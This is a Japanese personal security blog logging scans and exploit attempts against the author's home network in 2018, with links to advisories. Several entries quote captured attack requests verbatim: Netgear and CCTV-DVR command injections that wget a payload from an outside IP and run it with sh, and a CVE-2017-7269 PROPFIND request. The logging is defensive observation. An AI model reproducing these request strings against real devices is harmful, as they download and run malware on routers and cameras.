tanakaのセキュリティブロク

セキュリティブログにしたい。

通信解析2

以下から変化した内容を。

taka-tana-sec.hatenablog.com

脆弱性検知

・Netbios null session

 

NetBIOS Enumeration And Null Sessionxtraweb.wordpress.com

・LinkSys E-series ルータの脆弱性

うちには"http://xxx//tmUnblock.cgi" のアクセスがきました。

That new Linksys worm... : netsec

 

Huawei Router HG532 - Arbitrary Command Execution

うちには”POST /ctrlt/DeviceUpgrade_1 HTTP/1.1”のアクセスがきました。

www.exploit-db.com

Netgear DGN の脆弱性

うちには

"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://68.183.28.29/cock+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"

こちらがきました。

Bugtraq: Unauthenticated command execution on Netgear DGN devices

 

・CVE-2017-5638  (これは中国から大量に)

www.morihi-soc.net

 

・CVE-2017-10271/CVE-2017-3506

ハニーポット観察記録(38)「WebLogic の WLS Security に対するコマンド実行の試み(CVE-2017-10271)」 at www.morihi-soc.net

 

github.com

 

・Multiple CCTV-DVR Vendors - Remote Code Execution

我が家にはこちらが。

GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://209.141.50.26/b;sh${IFS}/tmp/bm&>r&&tar${IFS}/string.js HTTP/1.0

www.exploit-db.com

www.paloaltonetworks.jp

 

・CVE-2017-7269  

うちにはこちらが。

PROPFIND / HTTP/1.1
Host: localhost
Connection: Close
Content-Length: 0
If: <http://localhost/aaaaaaa........................................................................................................................................................................................................................................................................................................................................................................................................................................> (Not <locktoken:write1>) <http://localhost/bbbbbbb.............................................................................................................................................................................................................................................................................................................................................................................................

blog.trendmicro.co.jp

 

続きは明日以降で。

 

NICTさんからアクセス頂いておりました。2

18日に設定変更の諸々をやっているので、前後で少し違う見え方かも。

 

時間 元ポート 先ポート
2018/11/22 23:01 210.150.186.238 xx 40282 23
2018/11/22 21:57 210.150.186.238 xx 40282 5555
2018/11/22 9:12 210.150.186.238 xx 40282 52869
2018/11/22 8:23 210.150.186.238 xx 40282 8080
2018/11/22 8:04 210.150.186.238 xx 40282 22
2018/11/21 8:15 210.150.186.238 xx 40282 23023
2018/11/21 7:24 210.150.186.238 xx 40282 80
2018/11/20 18:56 210.150.186.238 xx 40282 8000
2018/11/19 17:11 210.150.186.238 xx 42093 23
2018/11/19 16:58 210.150.186.238 xx 42093 80
2018/11/19 13:35 210.150.186.238 xx 42093 22
2018/11/16 19:56 210.150.186.238 xx 46885 22
2018/11/16 17:00 210.150.186.238 xx 46973 80
2018/11/16 0:59 210.150.186.238 xx 41626 80
2018/11/15 21:18 210.150.186.238 xx 41626 23

 

以下は少し調べた内容。

 

・宛先ポート:23

注意情報|一般財団法人日本サイバー犯罪対策センター

・宛先ポート:5555

blog.nicter.jp

・宛先ポート:52869

www.npa.go.jp

・宛先ポート:23023

qiita.com

・宛先ポート:8000

blog.nicter.jp

NICTさんからアクセス頂いておりました。

すっかり忘れてました。

以下の記事から。

日本国内でインターネットに接続されたIoT機器等に関する事前調査の実施について | NICT-情報通信研究機構

抜粋~~~~~

  • 〇事前調査の概要
    • ・日本国内のIPv4アドレスを対象に、22/TCP(SSH)、23/TCP(Telnet)、80/TCP(HTTP)などの宛先ポートに対してポートスキャンを実施し、ポート開放状態のアドレス数の規模などの調査を行います。
    • ・ポート開放状態のアドレスに対してバナー情報の取得を行い、サービス種類やバージョン情報、機器種別などの状況調査を行います。
  • 〇事前調査の実施時期
    • 11月14日(水) に開始し、来年1月末までを目途に実施予定です。
  • ○事前調査に使用するIPアドレス
    • 以下のIPアドレスから実施します。
    •  210.150.186.238 、122.1.4.87、 122.1.4.88
    • ~~~~
    • 以下我が家へ。
  • 時間 元ポート 先ポート
    2018/11/16 19:56 210.150.186.238 xx 46885 22
    2018/11/16 17:00 210.150.186.238 xx 46973 80
    2018/11/16 0:59 210.150.186.238 xx 41626 80
    2018/11/15 21:18 210.150.186.238 xx 41626 23

通信解析 / 11月17日

昨日から今日昼までにあった自宅グローバル宛の通信について、まとめてみました。
何かのご参考になれば幸いです。

■不明なTCP通信 4件
宛先ポート:9339(送信元はUS)>通信中身はただの不明な文字列のみ

■不明なUDP通信 41件
宛先ポート:16403
宛先ポート:161
宛先ポート:443
宛先ポート:54155 
>すべて通信中身はただの不明な文字列のみ。(送信元はUS、China)

脆弱性検知

・SIPVicious を探していると思われる通信。27件
https://ja.osdn.net/projects/freshmeat_sipvicious/
SIPアプリケーションで、宛先ポート:5060、5090、11010、20001,6550、4010、65476など宛の通信。

・Netis / Netcoreの脆弱性をつく攻撃。35件
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb

・RPC Portmapper DUMPリクエスト。3件


■Web的な話。
・HTTPのHostヘッダがドメインじゃなくIPアドレスな通信 561件
*実際のグローバルIPもあれば関係ないグローバルIPが入っているケースも。
・wp-cron.phpへのアクセス。40件
Wordpressのcron機能で利用するページ。
http://www.webdesignleaves.com/wp/wordpress/432/

・adminページへのダイレクトアクセス。5件
・CONNECTメソッドでアクセス。1件。
・発行したセッションCookieを無視してアクセスしてきた。1件。
セッションハイジャックを狙ってるのかな。。
phpMyAdmin関連。40件
phpMyAdmin,phpMyAdmion,phpMyAdmin++,phpMyAdmin__,phpMyAdmin-oldなど
phpMyAdminだと設定でブロックされてるから、別パスでアクセスしてる?
・POST使ってphpページにいろんなデータを投げ込む。320件
*val=die(@md5(Ch3ck1ng)),admin=die(@md5(Ch3ck1ng))などなどのログが多数。
https://curiousprog.com/2018/10/03/a-wordpress-die-md5-exploit/

・ /m.php?pbid=open が2件。
こちらにも同じ形跡が。何を狙ってるんだろう。。

https://sec-owl.hatenablog.com/entry/2018/08/16/004324
・ /cmd.phpが6件。
・ /shell.phpが6件。

*これはコマンドインジェクション狙いかな。
・HTTPメソッドがPROPFIND

http://d.hatena.ne.jp/marmotte/20100106

・ /lala.phpが2件。
wafなどがお気に召さないご様子。malicousなのか?